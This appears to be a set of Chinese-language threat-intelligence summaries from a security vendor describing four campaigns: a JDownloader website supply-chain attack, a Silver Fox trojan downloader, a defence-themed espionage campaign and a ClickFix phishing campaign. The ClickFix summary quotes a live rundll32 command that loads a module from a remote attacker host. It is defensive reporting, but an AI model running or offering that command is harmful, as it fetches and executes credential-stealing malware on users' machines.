近日瑞星威胁情报平台捕获到一起针对开源下载管理器JDownloader官方网站的供应链攻击事件。攻击者利用官网CMS系统中的未修补漏洞,将官方下载页面中的安装程序链接替换为指向第三方恶意服务器的重定向地址,向用户投递以PyArmor 8+加密保护的基于Python 3.14的后门木马。Windows版本直接以脚本形式投递,Linux版本则通过PyInstaller打包为ELF二进制文件分发并具备root级持久化机制。此次攻击利用用户对官方分发渠道的信任,属于典型的网站级软件供应链攻击。
近期瑞星接到用户反馈的疑似银狐木马样本,经过分析确认,该样本是一个伪装成票务工具,是一个具备环境感知与按需投递能力的下载器,最终将下载易语言编写的模块化的银狐木马并执行。样本采用多阶段投递的方式,逐层按需落地恶意载荷。Payload执行后,并非立即窃取数据,而是优先完成对目标主机的深度环境画像,采集多种目标主机的内容,基于采集结果,恶意程序会动态评估目标价值,针对具备特定条件的机器,差异化下发特定恶意模块,实现按需精准操作的同时,大大的减少非任务代码暴露,增加分析难度。
近期,瑞星威胁情报平台捕获并深度解析了一起针对国防军事领域的定向渗透活动。该攻击具有鲜明的地缘政治背景,诱饵内容紧密围绕巴基斯坦防务展(IDEAS 2026)与北约坚定飞镖-2026军事演习两大热点事件,其目标精准指向国防工业供应链、政府外交人员及军事研究机构。
瑞星威胁情报平台近期捕获到一起利用ClickFix战术实施的钓鱼攻击活动。攻击者通过伪造验证页面并仿冒合法机构主题内容,诱导受害者在本机执行恶意命令:rundll32.exe \\r2-gate-entry.terralibre.in.net@80\verification.google,#1,随后从远程加载恶意模块并投放Amatera Stealer窃密木马。